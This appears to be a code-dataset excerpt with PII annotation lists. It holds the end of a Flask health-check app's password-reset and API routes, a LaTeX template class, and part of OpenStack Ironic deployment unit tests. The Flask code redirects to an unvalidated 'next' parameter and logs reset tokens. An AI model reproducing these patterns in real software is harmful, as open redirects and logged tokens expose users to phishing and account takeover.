return redirect(url_for('login', lang=g.current_lang)) + + flash(gettext('Password reset link sent via email'), 'success') + + if 'next' in request.args: + return redirect(request.args.get('next')) + return redirect(url_for('home', lang=g.current_lang)) + + +@APP.route('/reset/', methods=['GET', 'POST']) +@public_route +def reset(token=None): + """""" + Reset password submit form handling. + """""" + + # Must have at least a token to proceed. + if token is None: + return redirect(url_for('reset_req', lang=g.current_lang)) + + # Token received: verify if ok, may also time-out. + registered_user = User.verify_token(token) + if registered_user is None: + LOGGER.warn('Cannot find User from token: %s' % token) + flash(gettext('Invalid token'), 'danger') + return redirect(url_for('login', lang=g.current_lang)) + + # Token and user ok: return reset form. + if request.method == 'GET': + return render_template('reset_password_form.html') + + # Valid token and user: change password from form-value + password = request.form['password'] + if not password: + flash(gettext('Password required'), 'danger') + return redirect(url_for('reset/%s' % token, lang=g.current_lang)) + registered_user.set_password(password) + DB.session.add(registered_user) + + try: + DB.session.commit() + flash(gettext('Update password OK'), 'success') + except Exception as err: + msg = 'Update password failed!' + LOGGER.warn(msg + ' err=' + str(err)) + DB.session.rollback() + flash(gettext(msg), 'danger') + + # Finally redirect user to login page + return redirect(url_for('login', lang=g.current_lang)) + + +# +# REST Interface Calls +# + +@APP.route('/api/v1.0/summary') +@APP.route('/api/v1.0/summary/') +@APP.route('/api/v1.0/summary.') +def api_summary(content_type='json'): + """""" + Get health summary for all Resources within this instance. + """""" + + health_summary = views.get_health_summary() + + # Convert Runs to dict-like structure + for run in ['first_run', 'last_run']: + run_obj = health_summary.get(run, None) + if run_obj: + health_summary[run] = run_obj.for_json() + + # Convert Resources failing to dict-like structure + failed_resources = [] + for resource in health_summary['failed_resources']: + failed_resources.append(resource.for_json()) + health_summary['failed_resources'] = failed_resources + + if content_type == 'json': + result = jsonify(health_summary) + else: + result = '
    \n%s\n
    ' % \ + render_template('status_report_email.txt', + lang=g.current_lang, summary=health_summary) + return result + + +@APP.route('/api/v1.0/probes-avail/') +@APP.route('/api/v1.0/probes-avail/') +@APP.route('/api/v1.0/probes-avail//') +def api_probes_avail(resource_type=None, resource_id=None): + """""" + Get available (configured) Probes for this + installation, optional for resource type + """""" + resource = None + if resource_id: + resource = views.get_resource_by_id(resource_id) + + probes = views.get_probes_avail(resource_type=resource_type, + resource=resource) + return jsonify(probes) + + +@APP.route('/api/v1.0/runs/') +@APP.route('/api/v1.0/runs/.') +@APP.route('/api/v1.0/runs//') +@APP.route('/api/v1.0/runs//.') +def api_runs(resource_id, run_id=None, content_type='json'): + """""" + Get Runs (History of results) for Resource. + """""" + if run_id: + runs = [views.get_run_by_id(run_id)] + else: + runs = views.get_run_by_resource_id(resource_id) + + run_arr = [] + for run in runs: + run_dict = { + 'id': run.identifier, + 'success': run.success, + 'response_time': run.response_time, + 'checked_datetime': run.checked_datetime, + 'message': run.message, + 'report': run.report + } + run_arr.append(run_dict) + + runs_dict = {'total': len(run_arr), 'runs': run_arr} + result = 'unknown' + if content_type == 'json': + result = jsonify(runs_dict) + elif content_type == 'html': + result = render_template('includes/runs.html', + lang=g.current_lang, runs=runs_dict['runs']) + return result + + +if __name__ == '__main__': # run locally, for fun + import sys + + HOST = '127.0.0.1' + PORT = 8000 + if len(sys.argv) > 1: + HOST, PORT = sys.argv[1].split(':') + APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True) +",38819,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'Just van den Broecke'], ['DATE_TIME', '2014'], ['PERSON', 'Tom Kralidis'], ['LOCATION', 'DAMAGES'], ['PERSON', 'WHETHER'], ['LOCATION', 'jsonify'], ['NRP', 'German'], ['LOCATION', 'Español'], ['LOCATION', 'Bolivia'], ['NRP', 'Croatian'], ['LOCATION', 'Croatia'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['URL', 'request.sc'], ['URL', 'request.pa'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'MANAGER.re'], ['PERSON', 'TODO'], ['PERSON', 'RESOURCE_TYPES'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'rule.ru'], ['URL', 'r.id'], ['URL', 'r.fi'], ['URL', 'r.la'], ['PERSON', ""history_csv = '""], ['URL', 'resource.id'], ['PERSON', 'history_json'], ['URL', 'resource.id'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'resource.la'], ['URL', 'resource.re'], ['URL', 'rule.ru'], ['URL', 'resource.re'], ['URL', 'resource.owner.us'], ['PERSON', 'json'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['URL', 'rule.ru'], ['URL', 'run.re'], ['PERSON', ""methods=['GET""], ['LOCATION', 'msg2'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['URL', 'request.fo'], ['LOCATION', 'chain(tags'], ['PERSON', 'checks_param_info'], ['LOCATION', 'check_class'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'tag_obj'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', ""gettext('You""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'resource.cl'], ['PERSON', 'DB.session.delete(resource'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.re'], ['URL', 'APP.ro'], ['LOCATION', 'get_probe_edit_form(probe_class'], ['PERSON', 'Factory.create_obj(check_class'], ['PERSON', 'probe_check_param_defs = \\'], ['LOCATION', 'CheckVars(probe_vars'], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info ='], ['LOCATION', 'check_class'], ['LOCATION', 'lang=g.current_lang'], ['PERSON', 'check_info=check_info)\n\n\n'], ['PERSON', ""methods=['GET""], ['DATE_TIME', 'May'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'lang=g.current_lang'], ['URL', 'user.us'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['PERSON', ""methods=['GET""], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['LOCATION', 'lang=g.current_lang'], ['URL', 'g.cu'], ['PERSON', 'failed_resources.append(resource.for_json'], ['PERSON', 'lang=g.current_lang'], ['PERSON', 'lang=g.current_lang'], ['URL', 'https://flask-login.readthedocs.io'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'App.ge'], ['URL', 'MANAGER.in'], ['URL', 'LOGGER.in'], ['URL', 'LOGGER.in'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.be'], ['URL', 'g.us'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.ar'], ['URL', 'g.cu'], ['URL', 'request.pa'], ['URL', 'request.pa'], ['URL', 'g.user.is'], ['URL', 'APP.vi'], ['URL', 'function.is'], ['URL', 'DB.session.re'], ['URL', 'g.ge'], ['URL', 'request.ac'], ['URL', 'languages.be'], ['URL', 'LANGUAGES.ke'], ['URL', 'MANAGER.us'], ['URL', 'User.query.ge'], ['URL', 'request.headers.ge'], ['URL', 'val.re'], ['URL', 'User.query.fi'], ['URL', 'user.au'], ['URL', 'APP.co'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'tags.ke'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'home.ht'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'run.re'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'r.re'], ['URL', 'r.la'], ['URL', 'r.ma'], ['URL', 'r.re'], ['URL', 'r.id'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.la'], ['URL', 'run.re'], ['URL', 'resource.id'], ['URL', 'resource.owner.us'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'resource.id'], ['URL', 'resource.ma'], ['URL', 'resource.re'], ['URL', 'resource.la'], ['URL', 'resource.fi'], ['URL', 'resource.la'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'resource.ru'], ['URL', 'resource.owner.us'], ['URL', 'resource.re'], ['URL', 'output.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'request.args.ge'], ['URL', 'TYPES.ke'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.args.ge'], ['URL', 'views.li'], ['URL', 'resources.ht'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'resource.ht'], ['URL', 'APP.ro'], ['URL', 'register.ht'], ['URL', 'request.me'], ['URL', 'register.ht'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'request.fo'], ['URL', 'register.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'err.me'], ['URL', 'request.fo'], ['URL', 'g.user.is'], ['URL', 'add.ht'], ['URL', 'request.me'], ['URL', 'add.ht'], ['URL', 'request.fo'], ['URL', 'request.form.ge'], ['URL', 'Tag.query.fi'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'DB.session.ad'], ['URL', 'add.se'], ['URL', 'g.us'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'request.ge'], ['URL', 'Resource.query.fi'], ['URL', 'dict.it'], ['URL', 't.na'], ['URL', 'Tag.query.al'], ['URL', 'obj.na'], ['URL', 'DB.session.ad'], ['URL', 'Tag.query.fi'], ['URL', 'resource.tags.re'], ['URL', 'resource.pro'], ['URL', 'resource.pro'], ['URL', 'vars.re'], ['URL', 'LOGGER.in'], ['URL', 'vars.ch'], ['URL', 'resource.pro'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.se'], ['URL', 'v.st'], ['URL', 'resource.au'], ['URL', 'resource.ru'], ['URL', 'resource.ru'], ['URL', 'resource.la'], ['URL', 'LOGGER.er'], ['URL', 'DB.session.ro'], ['URL', 'DB.session.cl'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'result.me'], ['URL', 'request.me'], ['URL', 'result.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'request.re'], ['URL', 'views.ge'], ['URL', 'resource.re'], ['URL', 'Recipient.ge'], ['URL', 'g.user.us'], ['URL', 'resource.ht'], ['URL', 'g.cu'], ['URL', 'ResourceAuth.ge'], ['URL', 'APP.ro'], ['URL', 'Resource.query.fi'], ['URL', 'g.user.ro'], ['URL', 'g.user.us'], ['URL', 'resource.owner.us'], ['URL', 'DB.session.de'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'views.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'Factory.cr'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'form.ht'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'request.me'], ['URL', 'login.ht'], ['URL', 'request.fo'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.pa'], ['URL', 'user.au'], ['URL', 'request.ar'], ['URL', 'request.args.ge'], ['URL', 'request.re'], ['URL', 'request.re'], ['URL', 'request.me'], ['URL', 'request.ht'], ['URL', 'request.fo'], ['URL', 'User.query.fi'], ['URL', 'user.ge'], ['URL', 'g.cu'], ['URL', 'msg.as'], ['URL', 'request.args.ge'], ['URL', 'User.ve'], ['URL', 'request.me'], ['URL', 'form.ht'], ['URL', 'request.fo'], ['URL', 'user.se'], ['URL', 'DB.session.ad'], ['URL', 'DB.session.com'], ['URL', 'DB.session.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'summary.ge'], ['URL', 'obj.fo'], ['URL', 'resource.fo'], ['URL', 'g.cu'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'APP.ro'], ['URL', 'views.ge'], ['URL', 'views.ge'], ['URL', 'run.id'], ['URL', 'run.su'], ['URL', 'run.re'], ['URL', 'run.ch'], ['URL', 'run.me'], ['URL', 'run.re'], ['URL', 'runs.ht'], ['URL', 'g.cu'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'APP.ru']]" +32,"# Copyright 2012 (C) Mickael Menu dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License along +# with this program. If not, see . + +from string import Template + +from .tags import * + + +class FileTemplate(object): + """""" + The file template tool generates a full LaTeX/TikZ source from a template, preamble + and source. + """""" + def __init__(self, template, preamble, source): + assert preamble is not None and source is not None + super(FileTemplate, self).__init__() + self.content = """" + self.preamble = preamble + self.source = source + self.latex_template = Template(template) + + def buildFileContent(self): + """""" + Builds the TikZ document with given preamble and source and the document template. + """""" + self._buildPreambleChunk() + self._buildSourceChunk() + self._buildContentFromTemplate() + return self.content + + def _buildPreambleChunk(self): + self.preamble = ""%s\n%s\n%s\n"" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG) + + def _buildSourceChunk(self): + self.source = ""%s\n%s\n%s\n"" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG) + + def _buildContentFromTemplate(self): + self.content = TIKZ_TAG + ""\n"" + self.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source) +",1771,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'SOURCE_BEGIN_TAG'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.la'], ['URL', 'self.co'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.la'], ['URL', 'template.sa'], ['URL', 'self.pr'], ['URL', 'self.so']]" +33,"# Copyright (c) 2012 NTT DOCOMO, INC. +# Copyright 2011 OpenStack Foundation +# Copyright 2011 Ilya Alekseyev +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. + +import base64 +import gzip +import os +import shutil +import stat +import tempfile +import time +import types + +import mock +from oslo_concurrency import processutils +from oslo_config import cfg +from oslo_utils import uuidutils +import requests +import testtools + +from ironic.common import boot_devices +from ironic.common import disk_partitioner +from ironic.common import exception +from ironic.common import images +from ironic.common import states +from ironic.common import utils as common_utils +from ironic.conductor import task_manager +from ironic.conductor import utils as manager_utils +from ironic.drivers.modules import agent_client +from ironic.drivers.modules import deploy_utils as utils +from ironic.drivers.modules import image_cache +from ironic.tests import base as tests_base +from ironic.tests.conductor import utils as mgr_utils +from ironic.tests.db import base as db_base +from ironic.tests.db import utils as db_utils +from ironic.tests.objects import utils as obj_utils + +_PXECONF_DEPLOY = b"""""" +default deploy + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} + +label boot_whole_disk +COM32 chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +"""""" + +_PXECONF_BOOT_PARTITION = """""" +default boot_partition + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef + +label boot_whole_disk +COM32 chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +"""""" + +_PXECONF_BOOT_WHOLE_DISK = """""" +default boot_whole_disk + +label deploy +kernel deploy_kernel +append initrd=deploy_ramdisk +ipappend 3 + +label boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} + +label boot_whole_disk +COM32 chain.c32 +append mbr:0x12345678 +"""""" + +_IPXECONF_DEPLOY = b"""""" +#!ipxe + +dhcp + +goto deploy + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +boot +"""""" + +_IPXECONF_BOOT_PARTITION = """""" +#!ipxe + +dhcp + +goto boot_partition + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:{{ DISK_IDENTIFIER }} +boot +"""""" + +_IPXECONF_BOOT_WHOLE_DISK = """""" +#!ipxe + +dhcp + +goto boot_whole_disk + +:deploy +kernel deploy_kernel +initrd deploy_ramdisk +boot + +:boot_partition +kernel kernel +append initrd=ramdisk root={{ ROOT }} +boot + +:boot_whole_disk +kernel chain.c32 +append mbr:0x12345678 +boot +"""""" + +_UEFI_PXECONF_DEPLOY = b"""""" +default=deploy + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root={{ ROOT }}"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:{{ DISK_IDENTIFIER }}"" +"""""" + +_UEFI_PXECONF_BOOT_PARTITION = """""" +default=boot_partition + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root=UUID=12345678-1234-1234-1234-1234567890abcdef"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:{{ DISK_IDENTIFIER }}"" +"""""" + +_UEFI_PXECONF_BOOT_WHOLE_DISK = """""" +default=boot_whole_disk + +image=deploy_kernel + label=deploy + initrd=deploy_ramdisk + append=""ro text"" + +image=kernel + label=boot_partition + initrd=ramdisk + append=""root={{ ROOT }}"" + +image=chain.c32 + label=boot_whole_disk + append=""mbr:0x12345678"" +"""""" + + +@mock.patch.object(time, 'sleep', lambda seconds: None) +class PhysicalWorkTestCase(tests_base.TestCase): + + def _mock_calls(self, name_list): + patch_list = [mock.patch.object(utils, name, + spec_set=types.FunctionType) + for name in name_list] + mock_list = [patcher.start() for patcher in patch_list] + for patcher in patch_list: + self.addCleanup(patcher.stop) + + parent_mock = mock.MagicMock(spec=[]) + for mocker, name in zip(mock_list, name_list): + parent_mock.attach_mock(mocker, name) + return parent_mock + + def _test_deploy_partition_image(self, boot_option=None, boot_mode=None): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + swap_part = '/dev/fake-part1' + root_part = '/dev/fake-part2' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'block_uuid', 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part, + 'swap': swap_part} + + make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb, + configdrive_mb] + make_partitions_expected_kwargs = {'commit': True} + deploy_kwargs = {} + + if boot_option: + make_partitions_expected_kwargs['boot_option'] = boot_option + deploy_kwargs['boot_option'] = boot_option + else: + make_partitions_expected_kwargs['boot_option'] = 'netboot' + + if boot_mode: + make_partitions_expected_kwargs['boot_mode'] = boot_mode + deploy_kwargs['boot_mode'] = boot_mode + else: + make_partitions_expected_kwargs['boot_mode'] = 'bios' + + # If no boot_option, then it should default to netboot. + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions( + *make_partitions_expected_args, + **make_partitions_expected_kwargs), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuids_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs) + + self.assertEqual(calls_expected, parent_mock.mock_calls) + expected_uuid_dict = { + 'root uuid': root_uuid, + 'efi system partition uuid': None} + self.assertEqual(expected_uuid_dict, uuids_dict_returned) + + def test_deploy_partition_image_without_boot_option(self): + self._test_deploy_partition_image() + + def test_deploy_partition_image_netboot(self): + self._test_deploy_partition_image(boot_option=""netboot"") + + def test_deploy_partition_image_localboot(self): + self._test_deploy_partition_image(boot_option=""local"") + + def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self): + self._test_deploy_partition_image() + + def test_deploy_partition_image_netboot_bios(self): + self._test_deploy_partition_image(boot_option=""netboot"", + boot_mode=""bios"") + + def test_deploy_partition_image_localboot_bios(self): + self._test_deploy_partition_image(boot_option=""local"", + boot_mode=""bios"") + + def test_deploy_partition_image_netboot_uefi(self): + self._test_deploy_partition_image(boot_option=""netboot"", + boot_mode=""uefi"") + + @mock.patch.object(utils, 'get_image_mb', return_value=129, autospec=True) + def test_deploy_partition_image_image_exceeds_root_partition(self, + gim_mock): + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + self.assertRaises(exception.InstanceDeployFailure, + utils.deploy_partition_image, address, port, iqn, + lun, image_path, root_mb, swap_mb, ephemeral_mb, + ephemeral_format, node_uuid) + + gim_mock.assert_called_once_with(image_path) + + # We mock utils.block_uuid separately here because we can't predict + # the order in which it will be called. + @mock.patch.object(utils, 'block_uuid', autospec=True) + def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 64 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + swap_part = '/dev/fake-part2' + root_part = '/dev/fake-part3' + efi_system_part = '/dev/fake-part1' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + efi_system_part_uuid = '9036-482' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'mkfs', + 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + + def block_uuid_side_effect(device): + if device == root_part: + return root_uuid + if device == efi_system_part: + return efi_system_part_uuid + + block_uuid_mock.side_effect = block_uuid_side_effect + parent_mock.make_partitions.return_value = { + 'root': root_part, 'swap': swap_part, + 'efi system partition': efi_system_part} + + # If no boot_option, then it should default to netboot. + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""local"", + boot_mode=""uefi""), + mock.call.is_block_device(root_part), + mock.call.is_block_device(swap_part), + mock.call.is_block_device(efi_system_part), + mock.call.mkfs(dev=efi_system_part, fs='vfat', + label='efi-part'), + mock.call.populate_image(image_path, root_part), + mock.call.mkfs(dev=swap_part, fs='swap', + label='swap1'), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image( + address, port, iqn, lun, image_path, root_mb, swap_mb, + ephemeral_mb, ephemeral_format, node_uuid, boot_option=""local"", + boot_mode=""uefi"") + + self.assertEqual(calls_expected, parent_mock.mock_calls) + block_uuid_mock.assert_any_call('/dev/fake-part1') + block_uuid_mock.assert_any_call('/dev/fake-part3') + expected_uuid_dict = { + 'root uuid': root_uuid, + 'efi system partition uuid': efi_system_part_uuid} + self.assertEqual(expected_uuid_dict, uuid_dict_returned) + + def test_deploy_partition_image_without_swap(self): + """"""Check loosely all functions are called with right args."""""" + address = '127.0.0.1' + port = 3306 + iqn = 'iqn.xyz' + lun = 1 + image_path = '/tmp/xyz/image' + root_mb = 128 + swap_mb = 0 + ephemeral_mb = 0 + ephemeral_format = None + configdrive_mb = 0 + node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz"" + + dev = '/dev/fake' + root_part = '/dev/fake-part1' + root_uuid = '12345678-1234-1234-12345678-12345678abcdef' + + name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi', + 'logout_iscsi', 'delete_iscsi', 'make_partitions', + 'is_block_device', 'populate_image', 'block_uuid', + 'notify', 'destroy_disk_metadata'] + parent_mock = self._mock_calls(name_list) + parent_mock.get_dev.return_value = dev + parent_mock.get_image_mb.return_value = 1 + parent_mock.is_block_device.return_value = True + parent_mock.block_uuid.return_value = root_uuid + parent_mock.make_partitions.return_value = {'root': root_part} + calls_expected = [mock.call.get_image_mb(image_path), + mock.call.get_dev(address, port, iqn, lun), + mock.call.discovery(address, port), + mock.call.login_iscsi(address, port, iqn), + mock.call.is_block_device(dev), + mock.call.destroy_disk_metadata(dev, node_uuid), + mock.call.make_partitions(dev, root_mb, swap_mb, + ephemeral_mb, + configdrive_mb, + commit=True, + boot_option=""netboot"", + boot_mode=""bios""), + mock.call.is_block_device(root_part), + mock.call.populate_image(image_path, root_part), + mock.call.block_uuid(root_part), + mock.call.logout_iscsi(address, port, iqn), + mock.call.delete_iscsi(address, port, iqn)] + + uuid_dict_returned = utils.deploy_partition_image(address, port, iqn, + lun, image_path, + root_mb, swap_mb, + ephemeral_mb, + ephemeral_format, 